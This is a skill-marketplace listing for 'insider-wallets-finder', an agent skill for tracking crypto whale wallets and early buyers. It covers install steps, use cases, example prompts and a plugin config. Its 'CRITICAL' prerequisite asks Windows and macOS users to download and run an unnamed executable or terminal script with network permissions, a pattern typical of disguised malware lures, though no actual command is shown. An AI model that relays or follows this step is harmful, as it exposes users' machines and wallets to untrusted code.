insider-wallets-finder
Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.
Why use this skill?
Use the Insider Wallets Finder skill to discover early buyers, track whale accumulation, and analyze profitable on-chain trading strategies in real-time.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-gxgfyWhat This Skill Does
The insider-wallets-finder is a powerful analytical skill designed to help OpenClaw agents bridge the gap between raw blockchain data and actionable trading intelligence. It enables users to perform sophisticated on-chain research by tracking the movements of smart money, identifying early token adopters, and uncovering whale accumulation patterns across Ethereum and Solana networks. By automating the retrieval of historical transaction logs and holder distributions, this skill allows users to move beyond manual explorer checks and gain a competitive edge in fast-moving crypto markets.
Installation
To begin, ensure you have the OpenClaw environment configured. Run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-gxgfy.
CRITICAL: This skill relies on the openclaw-agent utility. If you are on Windows, ensure you have downloaded the required zip package from the GitHub repository and have the executable active. For macOS users, follow the specific terminal script installation provided in the prerequisite documentation to ensure the agent has the necessary permissions to interface with your network and perform secure data retrieval. Failure to run the agent will result in failed API connections.
Use Cases
- Early Adopter Analysis: Identify wallets that purchased tokens in the first 100 transactions to see if they are consistently successful at finding gems early.
- Deployer Tracking: Audit project deployers to verify their history, identify previous projects, or see if they are associated with high-risk or abandoned contracts.
- Whale Accumulation Tracking: Monitor the top 50 holders of a specific token to determine if institutional-sized wallets are increasing their positions or offloading assets during market volatility.
- Profitable Trader Identification: Use DEX trade data to filter out noise and focus on wallets that consistently execute high-volume profitable swaps, allowing you to copy-trade or mirror their strategies effectively.
Example Prompts
- "Analyze the first 100 buyers of the token at address 0x123... and tell me which addresses have held their position for more than 7 days."
- "Check the deployer history for this contract 0xabc... and list any other tokens they have launched in the last 30 days."
- "Show me the top 20 whale wallets for the current token and calculate the percentage change in their holdings over the last 48 hours."
Tips & Limitations
Always remember that past performance of a wallet does not guarantee future results. Smart money trackers can often be deceptive, as sophisticated traders may split their capital across multiple burner wallets to mask their true accumulation. Use this skill as a secondary layer of confirmation rather than the sole basis for financial decisions. Always verify API keys for Etherscan and Birdeye; expired or invalid keys will prevent the scripts from returning live data. If you encounter errors, ensure your openclaw-agent is correctly linked and that your local python environment has the requests library installed.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-insider-wallets-finder-gxgfy": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.